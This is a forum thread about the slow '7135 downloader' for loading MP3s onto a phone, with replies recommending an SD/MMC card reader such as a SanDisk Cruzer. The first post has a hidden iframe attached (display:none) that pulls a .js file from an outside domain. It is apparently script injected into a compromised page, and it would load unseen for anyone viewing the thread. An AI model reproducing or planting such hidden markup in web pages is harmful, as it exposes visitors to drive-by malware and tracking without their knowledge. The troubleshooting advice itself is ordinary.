+ Reply to Thread

7135 Downloader is slow!

I have read other posts, but did not see much in reference to the 7135 downloader. Holy Cow! It is soooooooo slow. I tried putting on about 100 megs of songs and it literally took an hour. Do I have to use the downloader for the MP3s or can I just put them on the secure digital card through a usb reader, for instance?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: 7135 Downloader is slow!

Originally posted by rguibara
    I have read other posts, but did not see much in reference to the 7135 downloader. Holy Cow! It is soooooooo slow. I tried putting on about 100 megs of songs and it literally took an hour. Do I have to use the downloader for the MP3s or can I just put them on the secure digital card through a usb reader, for instance?
    Do it through reader. Fraction of the time. Just make sure you placed it in the right directory. If you're not sure, do one very very very short song through downloader to create the directory.

Ok, I'll admit it here - I'm stupid. What type of USB reader are you referring to? I also noticed a painfully slow mp3 transfer process.

Many of us have purchased the SanDisk cruzer that comes with an SD card. Any SD/MMC card reader will work though.

http://www.compusa.com/products/prod...mid=&pfp=srch1

I just bought one on E-bay for 19.95 (just the Cruzer, I have a card for it). Make sure you get the one with the extension cable if you are plugging it in to a laptop or confined space.
    Cheers!

Frostie Dog

Originally posted by gomus
    Ok, I'll admit it here - I'm stupid. What type of USB reader are you referring to? I also noticed a painfully slow mp3 transfer process.
    You're not stupid, just inexperience. USB reader comes in all shape and sizes. The one you're looking for is an SD/MMC (Secure Digital/Multi-Media Card) reader. Many of the users here uses the Cruizer, I however have the 7-in-1 memory reader on my 3 1/2" bay on my pc. So mines can read MMC, Compact Flash, SD, MS, SM, Mini-Firewire, and USB.

If you use the cruzer device you can ransfer 70 songs onto a card in the same amount of time it would take you to load 1 song through the 7135 downloader.